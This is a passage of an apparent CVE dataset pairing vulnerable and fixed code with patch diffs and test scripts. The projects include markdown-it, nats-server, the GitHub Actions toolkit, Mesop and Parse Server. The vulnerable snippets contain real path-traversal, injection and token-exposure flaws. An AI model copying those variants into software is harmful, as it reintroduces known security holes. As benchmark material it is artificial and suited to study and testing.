params.append(param)\n otherparams['guild_id'] = guild.id\n if set(param['channel_id'] for param in params) \\\n - set(channel.id for channel in guild.channels): # is not empty\n raise web.HTTPBadRequest\n try:\n with self.db.connection:\n self.db.executemany(\n 'UPDATE channels SET lang=:lang, games_ping=:ping \\\nWHERE channel_id=:channel_id',\n params\n )\n self.db.execute(\n 'UPDATE guilds SET guild_disabled_commands=:disable_cmd, \\\nguild_disabled_cogs=:disable_cog, words_censor=:words_censor WHERE guild_id=:guild_id',\n otherparams\n )\n except sql.ProgrammingError as exc:\n raise 
web.HTTPBadRequest(reason=str(exc))\n raise web.HTTPSeeOther(request.path)"}], "vul_patch": "--- a/kenny2automate/server/__init__.py\n+++ b/kenny2automate/server/__init__.py\n@@ -26,6 +26,9 @@\n param['ping'] = '|'.join(param.get('ping', ())) or None\n params.append(param)\n otherparams['guild_id'] = guild.id\n+ if set(param['channel_id'] for param in params) \\\n+ - set(channel.id for channel in guild.channels): # is not empty\n+ raise web.HTTPBadRequest\n try:\n with self.db.connection:\n self.db.executemany(\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2015-3295", "cve_description": "markdown-it before 4.1.0 does not block data: URLs.", "cwe_info": {"CWE-284": {"name": "Improper Access Control", "description": "The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor."}}, "repo": "https://github.com/markdown-it/markdown-it", "patch_url": ["https://github.com/markdown-it/markdown-it/commit/f76d3beb46abd121892a2e2e5c78376354c214e3"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_61_1", "commit": "f7976b2", "file_path": "lib/index.js", "start_line": 24, "end_line": 35, "snippet": "var BAD_PROTOCOLS = [ 'vbscript', 'javascript', 'file' ];\n\nfunction validateLink(url) {\n // url should be normalized at this point, and existing entities are decoded\n //\n var str = url.trim().toLowerCase();\n\n if (str.indexOf(':') >= 0 && BAD_PROTOCOLS.indexOf(str.split(':')[0]) >= 0) {\n return false;\n }\n return true;\n}"}], "fix_func": [{"id": "fix_js_61_1", "commit": "f76d3be", "file_path": "lib/index.js", "start_line": 23, "end_line": 53, "snippet": "////////////////////////////////////////////////////////////////////////////////\n//\n// This validator does not pretent to functionality of full weight sanitizers.\n// It's a tradeoff between default security, simplicity and usability.\n// If you need different setup - override validator method as you wish. Or\n// replace it with dummy function and use external sanitizer.\n//\n\nvar BAD_PROTOCOLS = [ 'vbscript', 'javascript', 'file', 'data' ];\nvar ALLOWED_DATA_MIMES = [\n 'data:image/gif',\n 'data:image/png',\n 'data:image/jpeg',\n 'data:image/webp'\n];\n\nfunction validateLink(url) {\n // url should be normalized at this point, and existing entities are decoded\n\n var str = url.trim().toLowerCase(),\n protocol = str.split(':')[0];\n\n if (str.indexOf(':') >= 0 && BAD_PROTOCOLS.indexOf(protocol) >= 0) {\n if (protocol === 'data' && ALLOWED_DATA_MIMES.indexOf(str.split(';')[0]) >= 0) {\n return true;\n }\n return false;\n }\n\n return true;\n}"}], "vul_patch": "--- a/lib/index.js\n+++ b/lib/index.js\n@@ -1,12 +1,31 @@\n-var BAD_PROTOCOLS = [ 'vbscript', 'javascript', 'file' ];\n+////////////////////////////////////////////////////////////////////////////////\n+//\n+// This validator does not pretent to functionality of full weight sanitizers.\n+// It's a tradeoff between default security, simplicity and usability.\n+// If you need different setup - override validator method as you wish. 
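The kenny2automate fix above is a pure ownership check: the set of submitted channel IDs must be a subset of the guild's own channels. Isolated as a reusable Python helper (names are illustrative):

```python
def validate_channel_ids(submitted_ids, guild_channel_ids):
    # Reject the whole form if any submitted channel ID belongs to a
    # different guild than the one being configured (CVE-2023-22452).
    rogue = set(submitted_ids) - set(guild_channel_ids)
    if rogue:
        raise ValueError(f"channel ids not in this guild: {sorted(rogue)}")

validate_channel_ids([101, 102], [101, 102, 103])   # passes silently
# validate_channel_ids([101, 999], [101, 102, 103]) # raises ValueError
```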
Or\n+// replace it with dummy function and use external sanitizer.\n+//\n+\n+var BAD_PROTOCOLS = [ 'vbscript', 'javascript', 'file', 'data' ];\n+var ALLOWED_DATA_MIMES = [\n+ 'data:image/gif',\n+ 'data:image/png',\n+ 'data:image/jpeg',\n+ 'data:image/webp'\n+];\n \n function validateLink(url) {\n // url should be normalized at this point, and existing entities are decoded\n- //\n- var str = url.trim().toLowerCase();\n \n- if (str.indexOf(':') >= 0 && BAD_PROTOCOLS.indexOf(str.split(':')[0]) >= 0) {\n+ var str = url.trim().toLowerCase(),\n+ protocol = str.split(':')[0];\n+\n+ if (str.indexOf(':') >= 0 && BAD_PROTOCOLS.indexOf(protocol) >= 0) {\n+ if (protocol === 'data' && ALLOWED_DATA_MIMES.indexOf(str.split(';')[0]) >= 0) {\n+ return true;\n+ }\n return false;\n }\n+\n return true;\n }\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2015-3295:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/markdown-it\ngit apply --whitespace=nowarn /workspace/fix.patch /workspace/test.patch \nnpx mocha test/markdown-it.js\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2015-3295:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/markdown-it\ngit apply --whitespace=nowarn /workspace/fix.patch\n\nnpx mocha test/misc.js test/ruler.js test/utils.js test/token.js test/commonmark.js\n"} {"cve_id": "CVE-2022-28357", "cve_description": "NATS nats-server 2.2.0 through 2.7.4 allows directory traversal because of an unintended path to a management action from a management account.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/nats-io/nats-server", "patch_url": ["https://github.com/nats-io/nats-server/commit/64feb142a92fb9bd98f117df8b5cd7fd71ee0c76"], "programing_language": "Go", "vul_func": [{"id": "vul_go_150_1", "commit": "92f4dc9", "file_path": "server/dirstore.go", "start_line": 313, "end_line": 329, "snippet": "func (store *DirJWTStore) Merge(pack string) error {\n\tnewJWTs := strings.Split(pack, \"\\n\")\n\tfor _, line := range newJWTs {\n\t\tif line == _EMPTY_ { // ignore blank lines\n\t\t\tcontinue\n\t\t}\n\t\tsplit := strings.Split(line, \"|\")\n\t\tif len(split) != 2 {\n\t\t\treturn fmt.Errorf(\"line in package didn't contain 2 entries: %q\", line)\n\t\t}\n\t\tpubKey := split[0]\n\t\tif err := store.saveIfNewer(pubKey, split[1]); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}"}, {"id": "vul_go_150_2", "commit": "92f4dc9", "file_path": "server/dirstore.go", "start_line": 369, "end_line": 380, "snippet": "func (store *DirJWTStore) pathForKey(publicKey string) string {\n\tif len(publicKey) < 2 {\n\t\treturn _EMPTY_\n\t}\n\tfileName := fmt.Sprintf(\"%s%s\", publicKey, fileExtension)\n\tif store.shard {\n\t\tlast := publicKey[len(publicKey)-2:]\n\t\treturn filepath.Join(store.directory, last, fileName)\n\t} else {\n\t\treturn filepath.Join(store.directory, fileName)\n\t}\n}"}, {"id": "vul_go_150_3", "commit": "92f4dc9", "file_path": "server/dirstore.go", "start_line": 492, "end_line": 529, "snippet": "func (store *DirJWTStore) saveIfNewer(publicKey string, theJWT 
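The markdown-it record above shows the allowlist-within-a-blocklist shape: `data:` joins the bad protocols, then four image MIME types are explicitly re-allowed. The same validator, transliterated into a Python sketch for comparison (logic mirrors `validateLink`):

```python
BAD_PROTOCOLS = {"vbscript", "javascript", "file", "data"}
ALLOWED_DATA_MIMES = {
    "data:image/gif", "data:image/png", "data:image/jpeg", "data:image/webp",
}

def validate_link(url: str) -> bool:
    s = url.strip().lower()
    if ":" in s and s.split(":")[0] in BAD_PROTOCOLS:
        # data: URLs survive only for a fixed set of image MIME types.
        return s.split(":")[0] == "data" and s.split(";")[0] in ALLOWED_DATA_MIMES
    return True

assert validate_link("data:image/png;base64,iVBORw0KGgo=")
assert not validate_link("data:text/html;base64,PHNjcmlwdD4=")
assert not validate_link("javascript:alert(1)")
```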
string) error {\n\tif store.readonly {\n\t\treturn fmt.Errorf(\"store is read-only\")\n\t}\n\tpath := store.pathForKey(publicKey)\n\tif path == _EMPTY_ {\n\t\treturn fmt.Errorf(\"invalid public key\")\n\t}\n\tdirPath := filepath.Dir(path)\n\tif _, err := validateDirPath(dirPath); err != nil {\n\t\tif err := os.MkdirAll(dirPath, defaultDirPerms); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\tif _, err := os.Stat(path); err == nil {\n\t\tif newJWT, err := jwt.DecodeGeneric(theJWT); err != nil {\n\t\t\t// skip if it can't be decoded\n\t\t} else if existing, err := ioutil.ReadFile(path); err != nil {\n\t\t\treturn err\n\t\t} else if existingJWT, err := jwt.DecodeGeneric(string(existing)); err != nil {\n\t\t\t// skip if it can't be decoded\n\t\t} else if existingJWT.ID == newJWT.ID {\n\t\t\treturn nil\n\t\t} else if existingJWT.IssuedAt > newJWT.IssuedAt {\n\t\t\treturn nil\n\t\t}\n\t}\n\tstore.Lock()\n\tcb := store.changed\n\tchanged, err := store.write(path, publicKey, theJWT)\n\tstore.Unlock()\n\tif err != nil {\n\t\treturn err\n\t} else if changed && cb != nil {\n\t\tcb(publicKey)\n\t}\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_150_1", "commit": "64feb14", "file_path": "server/dirstore.go", "start_line": 315, "end_line": 334, "snippet": "func (store *DirJWTStore) Merge(pack string) error {\n\tnewJWTs := strings.Split(pack, \"\\n\")\n\tfor _, line := range newJWTs {\n\t\tif line == _EMPTY_ { // ignore blank lines\n\t\t\tcontinue\n\t\t}\n\t\tsplit := strings.Split(line, \"|\")\n\t\tif len(split) != 2 {\n\t\t\treturn fmt.Errorf(\"line in package didn't contain 2 entries: %q\", line)\n\t\t}\n\t\tpubKey := split[0]\n\t\tif !nkeys.IsValidPublicAccountKey(pubKey) {\n\t\t\treturn fmt.Errorf(\"key to merge is not a valid public account key\")\n\t\t}\n\t\tif err := store.saveIfNewer(pubKey, split[1]); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}"}, {"id": "fix_go_150_2", "commit": "64feb14", "file_path": "server/dirstore.go", "start_line": 374, "end_line": 388, "snippet": "func (store *DirJWTStore) pathForKey(publicKey string) string {\n\tif len(publicKey) < 2 {\n\t\treturn _EMPTY_\n\t}\n\tif !nkeys.IsValidPublicKey(publicKey) {\n\t\treturn _EMPTY_\n\t}\n\tfileName := fmt.Sprintf(\"%s%s\", publicKey, fileExtension)\n\tif store.shard {\n\t\tlast := publicKey[len(publicKey)-2:]\n\t\treturn filepath.Join(store.directory, last, fileName)\n\t} else {\n\t\treturn filepath.Join(store.directory, fileName)\n\t}\n}"}, {"id": "fix_go_150_3", "commit": "64feb14", "file_path": "server/dirstore.go", "start_line": 500, "end_line": 541, "snippet": "func (store *DirJWTStore) saveIfNewer(publicKey string, theJWT string) error {\n\tif store.readonly {\n\t\treturn fmt.Errorf(\"store is read-only\")\n\t}\n\tpath := store.pathForKey(publicKey)\n\tif path == _EMPTY_ {\n\t\treturn fmt.Errorf(\"invalid public key\")\n\t}\n\tdirPath := filepath.Dir(path)\n\tif _, err := validateDirPath(dirPath); err != nil {\n\t\tif err := os.MkdirAll(dirPath, defaultDirPerms); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\tif _, err := os.Stat(path); err == nil {\n\t\tif newJWT, err := jwt.DecodeGeneric(theJWT); err != nil {\n\t\t\treturn err\n\t\t} else if existing, err := ioutil.ReadFile(path); err != nil {\n\t\t\treturn err\n\t\t} else if existingJWT, err := jwt.DecodeGeneric(string(existing)); err != nil {\n\t\t\t// skip if it can't be decoded\n\t\t} else if existingJWT.ID == newJWT.ID {\n\t\t\treturn nil\n\t\t} else if existingJWT.IssuedAt > newJWT.IssuedAt {\n\t\t\treturn nil\n\t\t} else if newJWT.Subject != 
publicKey {\n\t\t\treturn fmt.Errorf(\"jwt subject nkey and provided nkey do not match\")\n\t\t} else if existingJWT.Subject != newJWT.Subject {\n\t\t\treturn fmt.Errorf(\"subject of existing and new jwt do not match\")\n\t\t}\n\t}\n\tstore.Lock()\n\tcb := store.changed\n\tchanged, err := store.write(path, publicKey, theJWT)\n\tstore.Unlock()\n\tif err != nil {\n\t\treturn err\n\t} else if changed && cb != nil {\n\t\tcb(publicKey)\n\t}\n\treturn nil\n}"}], "vul_patch": "--- a/server/dirstore.go\n+++ b/server/dirstore.go\n@@ -9,6 +9,9 @@\n \t\t\treturn fmt.Errorf(\"line in package didn't contain 2 entries: %q\", line)\n \t\t}\n \t\tpubKey := split[0]\n+\t\tif !nkeys.IsValidPublicAccountKey(pubKey) {\n+\t\t\treturn fmt.Errorf(\"key to merge is not a valid public account key\")\n+\t\t}\n \t\tif err := store.saveIfNewer(pubKey, split[1]); err != nil {\n \t\t\treturn err\n \t\t}\n\n--- a/server/dirstore.go\n+++ b/server/dirstore.go\n@@ -1,5 +1,8 @@\n func (store *DirJWTStore) pathForKey(publicKey string) string {\n \tif len(publicKey) < 2 {\n+\t\treturn _EMPTY_\n+\t}\n+\tif !nkeys.IsValidPublicKey(publicKey) {\n \t\treturn _EMPTY_\n \t}\n \tfileName := fmt.Sprintf(\"%s%s\", publicKey, fileExtension)\n\n--- a/server/dirstore.go\n+++ b/server/dirstore.go\n@@ -14,7 +14,7 @@\n \t}\n \tif _, err := os.Stat(path); err == nil {\n \t\tif newJWT, err := jwt.DecodeGeneric(theJWT); err != nil {\n-\t\t\t// skip if it can't be decoded\n+\t\t\treturn err\n \t\t} else if existing, err := ioutil.ReadFile(path); err != nil {\n \t\t\treturn err\n \t\t} else if existingJWT, err := jwt.DecodeGeneric(string(existing)); err != nil {\n@@ -23,6 +23,10 @@\n \t\t\treturn nil\n \t\t} else if existingJWT.IssuedAt > newJWT.IssuedAt {\n \t\t\treturn nil\n+\t\t} else if newJWT.Subject != publicKey {\n+\t\t\treturn fmt.Errorf(\"jwt subject nkey and provided nkey do not match\")\n+\t\t} else if existingJWT.Subject != newJWT.Subject {\n+\t\t\treturn fmt.Errorf(\"subject of existing and new jwt do not match\")\n \t\t}\n \t}\n \tstore.Lock()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-35954", "cve_description": "The GitHub Actions ToolKit provides a set of packages to make creating actions easier. The `core.exportVariable` function uses a well known delimiter that attackers can use to break out of that specific variable and assign values to other arbitrary variables. Workflows that write untrusted values to the `GITHUB_ENV` file may cause the path or other environment variables to be modified without the intention of the workflow or action author. Users should upgrade to `@actions/core v1.9.1`. 
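The NATS fix above stops traversal before any path is built: a public key only reaches `pathForKey` if it passes `nkeys.IsValidPublicKey`, and merged pack entries must be valid account keys. A Python sketch of the same derive-paths-only-from-validated-identifiers rule (the regex only approximates the real nkeys check; treat it as an assumption):

```python
import os
import re

# Approximation: account public keys are 56 base32 characters starting
# with 'A', so a valid key can never contain '/', '\\' or '..'.
_ACCOUNT_KEY = re.compile(r"^A[A-Z2-7]{55}$")

def path_for_key(store_dir: str, public_key: str) -> str:
    if not _ACCOUNT_KEY.match(public_key):
        raise ValueError("not a valid public account key")
    return os.path.join(store_dir, public_key + ".jwt")
```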
If you are unable to upgrade the `@actions/core` package, you can modify your action to ensure that any user input does not contain the delimiter `_GitHubActionsFileCommandDelimeter_` before calling `core.exportVariable`.", "cwe_info": {"CWE-74": {"name": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "description": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component."}}, "repo": "https://github.com/actions/toolkit", "patch_url": ["https://github.com/actions/toolkit/commit/4beda9cbc00ba6eefe387a937c21087ccb8ee9df"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_134_1", "commit": "90be12a", "file_path": "packages/core/src/core.ts", "start_line": 83, "end_line": 95, "snippet": "export function exportVariable(name: string, val: any): void {\n const convertedVal = toCommandValue(val)\n process.env[name] = convertedVal\n\n const filePath = process.env['GITHUB_ENV'] || ''\n if (filePath) {\n const delimiter = '_GitHubActionsFileCommandDelimeter_'\n const commandValue = `${name}<<${delimiter}${os.EOL}${convertedVal}${os.EOL}${delimiter}`\n issueFileCommand('ENV', commandValue)\n } else {\n issueCommand('set-env', {name}, convertedVal)\n }\n}"}], "fix_func": [{"id": "fix_js_134_1", "commit": "4beda9c", "file_path": "packages/core/src/core.ts", "start_line": 84, "end_line": 106, "snippet": "export function exportVariable(name: string, val: any): void {\n const convertedVal = toCommandValue(val)\n process.env[name] = convertedVal\n\n const filePath = process.env['GITHUB_ENV'] || ''\n if (filePath) {\n const delimiter = `ghadelimiter_${uuidv4()}`\n\n // These should realistically never happen, but just in case someone finds a way to exploit uuid generation let's not allow keys or values that contain the delimiter. \n if (name.includes(delimiter)) {\n throw new Error(`Unexpected input: name should not contain the delimiter \"${delimiter}\"`)\n }\n\n if (convertedVal.includes(delimiter)) {\n throw new Error(`Unexpected input: value should not contain the delimiter \"${delimiter}\"`)\n }\n\n const commandValue = `${name}<<${delimiter}${os.EOL}${convertedVal}${os.EOL}${delimiter}`\n issueFileCommand('ENV', commandValue)\n } else {\n issueCommand('set-env', {name}, convertedVal)\n }\n}"}], "vul_patch": "--- a/packages/core/src/core.ts\n+++ b/packages/core/src/core.ts\n@@ -4,7 +4,17 @@\n \n const filePath = process.env['GITHUB_ENV'] || ''\n if (filePath) {\n- const delimiter = '_GitHubActionsFileCommandDelimeter_'\n+ const delimiter = `ghadelimiter_${uuidv4()}`\n+\n+ // These should realistically never happen, but just in case someone finds a way to exploit uuid generation let's not allow keys or values that contain the delimiter. 
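For CVE-2022-35954 the core change is replacing a well-known heredoc delimiter with a random per-write one, plus refusing any input that contains it. A Python sketch of the same pattern (the file format follows the `GITHUB_ENV` convention quoted above; the function name is illustrative):

```python
import uuid

def export_variable(env_file: str, name: str, value: str) -> None:
    # A fresh random delimiter per write means untrusted values cannot
    # terminate the block early and smuggle in extra assignments.
    delimiter = f"ghadelimiter_{uuid.uuid4()}"
    if delimiter in name or delimiter in value:
        raise ValueError("input must not contain the delimiter")
    with open(env_file, "a", encoding="utf-8") as f:
        f.write(f"{name}<<{delimiter}\n{value}\n{delimiter}\n")
```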
\n+ if (name.includes(delimiter)) {\n+ throw new Error(`Unexpected input: name should not contain the delimiter \"${delimiter}\"`)\n+ }\n+\n+ if (convertedVal.includes(delimiter)) {\n+ throw new Error(`Unexpected input: value should not contain the delimiter \"${delimiter}\"`)\n+ }\n+\n const commandValue = `${name}<<${delimiter}${os.EOL}${convertedVal}${os.EOL}${delimiter}`\n issueFileCommand('ENV', commandValue)\n } else {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-45601", "cve_description": "Mesop is a Python-based UI framework designed for rapid web apps development. A vulnerability has been discovered and fixed in Mesop that could potentially allow unauthorized access to files on the server hosting the Mesop application. The vulnerability was related to insufficient input validation in a specific endpoint. This could have allowed an attacker to access files not intended to be served. Users are strongly advised to update to the latest version of Mesop immediately. The latest version includes a fix for this vulnerability. At time of publication 0.12.4 is the most recently available version of Mesop.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/google/mesop", "patch_url": ["https://github.com/google/mesop/commit/17fb769d6a91f0a8cbccfab18f64977b158a6a31"], "programing_language": "Python", "vul_func": [{"id": "vul_py_233_1", "commit": "6f021e8", "file_path": "mesop/server/static_file_serving.py", "start_line": 93, "end_line": 104, "snippet": " def serve_web_components(path: str):\n if not is_file_path(path):\n raise MesopException(\"Unexpected request to \" + path)\n serving_path = (\n get_runfile_location(path)\n if has_runfiles()\n else os.path.join(os.getcwd(), path)\n )\n return send_file_compressed(\n serving_path,\n disable_gzip_cache=disable_gzip_cache,\n )"}], "fix_func": [{"id": "fix_py_233_1", "commit": "17fb769", "file_path": "mesop/server/static_file_serving.py", "start_line": 93, "end_line": 115, "snippet": " def serve_web_components(path: str):\n if not is_file_path(path):\n raise MesopException(\"Unexpected request to \" + path)\n serving_path = (\n get_runfile_location(path)\n if has_runfiles()\n else safe_join(os.getcwd(), path)\n )\n\n file_name = os.path.basename(path)\n file_extension = os.path.splitext(file_name)[1].lower()\n allowed_extensions = {\".js\", \".css\"}\n if file_extension not in allowed_extensions:\n raise MesopException(\n f\"Unexpected file type: {file_extension}. 
Only {', '.join(allowed_extensions)} files are allowed.\"\n )\n\n if not serving_path:\n raise MesopException(\"Unexpected request to \" + path)\n return send_file_compressed(\n serving_path,\n disable_gzip_cache=disable_gzip_cache,\n )"}], "vul_patch": "--- a/mesop/server/static_file_serving.py\n+++ b/mesop/server/static_file_serving.py\n@@ -4,8 +4,19 @@\n serving_path = (\n get_runfile_location(path)\n if has_runfiles()\n- else os.path.join(os.getcwd(), path)\n+ else safe_join(os.getcwd(), path)\n )\n+\n+ file_name = os.path.basename(path)\n+ file_extension = os.path.splitext(file_name)[1].lower()\n+ allowed_extensions = {\".js\", \".css\"}\n+ if file_extension not in allowed_extensions:\n+ raise MesopException(\n+ f\"Unexpected file type: {file_extension}. Only {', '.join(allowed_extensions)} files are allowed.\"\n+ )\n+\n+ if not serving_path:\n+ raise MesopException(\"Unexpected request to \" + path)\n return send_file_compressed(\n serving_path,\n disable_gzip_cache=disable_gzip_cache,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-41109", "cve_description": "Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to version 4.10.4, for regular (non-LiveQuery) queries, the session token is removed from the response, but for LiveQuery payloads it is currently not. If a user has a LiveQuery subscription on the `Parse.User` class, all session tokens created during user sign-ups will be broadcast as part of the LiveQuery payload. A patch in version 4.10.4 removes session tokens from the LiveQuery payload. As a workaround, set `user.acl(new Parse.ACL())` in a beforeSave trigger to make the user private already on sign-up.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/parse-community/parse-server", "patch_url": ["https://github.com/parse-community/parse-server/commit/4ac4b7f71002ed4fbedbb901db1f6ed1e9ac5559"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_251_1", "commit": "6683cd9", "file_path": "src/LiveQuery/ParseLiveQueryServer.js", "start_line": 124, "end_line": 200, "snippet": " _onAfterDelete(message: any): void {\n logger.verbose(Parse.applicationId + 'afterDelete is triggered');\n\n let deletedParseObject = message.currentParseObject.toJSON();\n const classLevelPermissions = message.classLevelPermissions;\n const className = deletedParseObject.className;\n logger.verbose('ClassName: %j | ObjectId: %s', className, deletedParseObject.id);\n logger.verbose('Current client number : %d', this.clients.size);\n\n const classSubscriptions = this.subscriptions.get(className);\n if (typeof classSubscriptions === 'undefined') {\n logger.debug('Can not find subscriptions under this class ' + className);\n return;\n }\n for (const subscription of classSubscriptions.values()) {\n const isSubscriptionMatched = this._matchesSubscription(deletedParseObject, subscription);\n if (!isSubscriptionMatched) {\n continue;\n }\n for (const [clientId, requestIds] of _.entries(subscription.clientRequestIds)) {\n const client = this.clients.get(clientId);\n if (typeof client === 'undefined') {\n continue;\n }\n for (const requestId of requestIds) {\n const acl = message.currentParseObject.getACL();\n // Check CLP\n const op = this._getCLPOperation(subscription.query);\n let res = {};\n 
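The Mesop fix combines two independent guards: a safe join that must not escape the working directory, and an extension allowlist. A self-contained Python sketch that implements the containment check by hand rather than relying on a framework helper (the allowlist mirrors the patch; `resolve_static` is a hypothetical name):

```python
import os

ALLOWED_EXTENSIONS = {".js", ".css"}

def resolve_static(root: str, requested: str) -> str:
    ext = os.path.splitext(requested)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"unexpected file type: {ext!r}")
    real_root = os.path.realpath(root)
    full = os.path.realpath(os.path.join(real_root, requested))
    # Containment check: the resolved path must still live under root.
    if os.path.commonpath([full, real_root]) != real_root:
        raise ValueError("path escapes the serving root")
    return full
```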
this._matchesCLP(classLevelPermissions, message.currentParseObject, client, requestId, op)\n .then(() => {\n // Check ACL\n return this._matchesACL(acl, client, requestId);\n })\n .then(isMatched => {\n if (!isMatched) {\n return null;\n }\n res = {\n event: 'delete',\n sessionToken: client.sessionToken,\n object: deletedParseObject,\n clients: this.clients.size,\n subscriptions: this.subscriptions.size,\n useMasterKey: client.hasMasterKey,\n installationId: client.installationId,\n sendEvent: true,\n };\n return maybeRunAfterEventTrigger('afterEvent', className, res);\n })\n .then(() => {\n if (!res.sendEvent) {\n return;\n }\n if (res.object && typeof res.object.toJSON === 'function') {\n deletedParseObject = res.object.toJSON();\n deletedParseObject.className = className;\n }\n client.pushDelete(requestId, deletedParseObject);\n })\n .catch(error => {\n Client.pushError(\n client.parseWebSocket,\n error.code || 141,\n error.message || error,\n false,\n requestId\n );\n logger.error(\n `Failed running afterLiveQueryEvent on class ${className} for event ${res.event} with session ${res.sessionToken} with:\\n Error: ` +\n JSON.stringify(error)\n );\n });\n }\n }\n }\n }"}, {"id": "vul_js_251_2", "commit": "6683cd9", "file_path": "src/LiveQuery/ParseLiveQueryServer.js", "start_line": 204, "end_line": 341, "snippet": " _onAfterSave(message: any): void {\n logger.verbose(Parse.applicationId + 'afterSave is triggered');\n\n let originalParseObject = null;\n if (message.originalParseObject) {\n originalParseObject = message.originalParseObject.toJSON();\n }\n const classLevelPermissions = message.classLevelPermissions;\n let currentParseObject = message.currentParseObject.toJSON();\n const className = currentParseObject.className;\n logger.verbose('ClassName: %s | ObjectId: %s', className, currentParseObject.id);\n logger.verbose('Current client number : %d', this.clients.size);\n\n const classSubscriptions = this.subscriptions.get(className);\n if (typeof classSubscriptions === 'undefined') {\n logger.debug('Can not find subscriptions under this class ' + className);\n return;\n }\n for (const subscription of classSubscriptions.values()) {\n const isOriginalSubscriptionMatched = this._matchesSubscription(\n originalParseObject,\n subscription\n );\n const isCurrentSubscriptionMatched = this._matchesSubscription(\n currentParseObject,\n subscription\n );\n for (const [clientId, requestIds] of _.entries(subscription.clientRequestIds)) {\n const client = this.clients.get(clientId);\n if (typeof client === 'undefined') {\n continue;\n }\n for (const requestId of requestIds) {\n // Set orignal ParseObject ACL checking promise, if the object does not match\n // subscription, we do not need to check ACL\n let originalACLCheckingPromise;\n if (!isOriginalSubscriptionMatched) {\n originalACLCheckingPromise = Promise.resolve(false);\n } else {\n let originalACL;\n if (message.originalParseObject) {\n originalACL = message.originalParseObject.getACL();\n }\n originalACLCheckingPromise = this._matchesACL(originalACL, client, requestId);\n }\n // Set current ParseObject ACL checking promise, if the object does not match\n // subscription, we do not need to check ACL\n let currentACLCheckingPromise;\n let res = {};\n if (!isCurrentSubscriptionMatched) {\n currentACLCheckingPromise = Promise.resolve(false);\n } else {\n const currentACL = message.currentParseObject.getACL();\n currentACLCheckingPromise = this._matchesACL(currentACL, client, requestId);\n }\n const op = 
this._getCLPOperation(subscription.query);\n this._matchesCLP(classLevelPermissions, message.currentParseObject, client, requestId, op)\n .then(() => {\n return Promise.all([originalACLCheckingPromise, currentACLCheckingPromise]);\n })\n .then(([isOriginalMatched, isCurrentMatched]) => {\n logger.verbose(\n 'Original %j | Current %j | Match: %s, %s, %s, %s | Query: %s',\n originalParseObject,\n currentParseObject,\n isOriginalSubscriptionMatched,\n isCurrentSubscriptionMatched,\n isOriginalMatched,\n isCurrentMatched,\n subscription.hash\n );\n // Decide event type\n let type;\n if (isOriginalMatched && isCurrentMatched) {\n type = 'update';\n } else if (isOriginalMatched && !isCurrentMatched) {\n type = 'leave';\n } else if (!isOriginalMatched && isCurrentMatched) {\n if (originalParseObject) {\n type = 'enter';\n } else {\n type = 'create';\n }\n } else {\n return null;\n }\n message.event = type;\n res = {\n event: type,\n sessionToken: client.sessionToken,\n object: currentParseObject,\n original: originalParseObject,\n clients: this.clients.size,\n subscriptions: this.subscriptions.size,\n useMasterKey: client.hasMasterKey,\n installationId: client.installationId,\n sendEvent: true,\n };\n return maybeRunAfterEventTrigger('afterEvent', className, res);\n })\n .then(\n () => {\n if (!res.sendEvent) {\n return;\n }\n if (res.object && typeof res.object.toJSON === 'function') {\n currentParseObject = res.object.toJSON();\n currentParseObject.className = res.object.className || className;\n }\n\n if (res.original && typeof res.original.toJSON === 'function') {\n originalParseObject = res.original.toJSON();\n originalParseObject.className = res.original.className || className;\n }\n const functionName =\n 'push' + message.event.charAt(0).toUpperCase() + message.event.slice(1);\n if (client[functionName]) {\n client[functionName](requestId, currentParseObject, originalParseObject);\n }\n },\n error => {\n Client.pushError(\n client.parseWebSocket,\n error.code || 141,\n error.message || error,\n false,\n requestId\n );\n logger.error(\n `Failed running afterLiveQueryEvent on class ${className} for event ${res.event} with session ${res.sessionToken} with:\\n Error: ` +\n JSON.stringify(error)\n );\n }\n );\n }\n }\n }\n }"}], "fix_func": [{"id": "fix_js_251_1", "commit": "4ac4b7f71002ed4fbedbb901db1f6ed1e9ac5559", "file_path": "src/LiveQuery/ParseLiveQueryServer.js", "start_line": 124, "end_line": 208, "snippet": " _onAfterDelete(message: any): void {\n logger.verbose(Parse.applicationId + 'afterDelete is triggered');\n\n let deletedParseObject = message.currentParseObject.toJSON();\n const classLevelPermissions = message.classLevelPermissions;\n const className = deletedParseObject.className;\n logger.verbose('ClassName: %j | 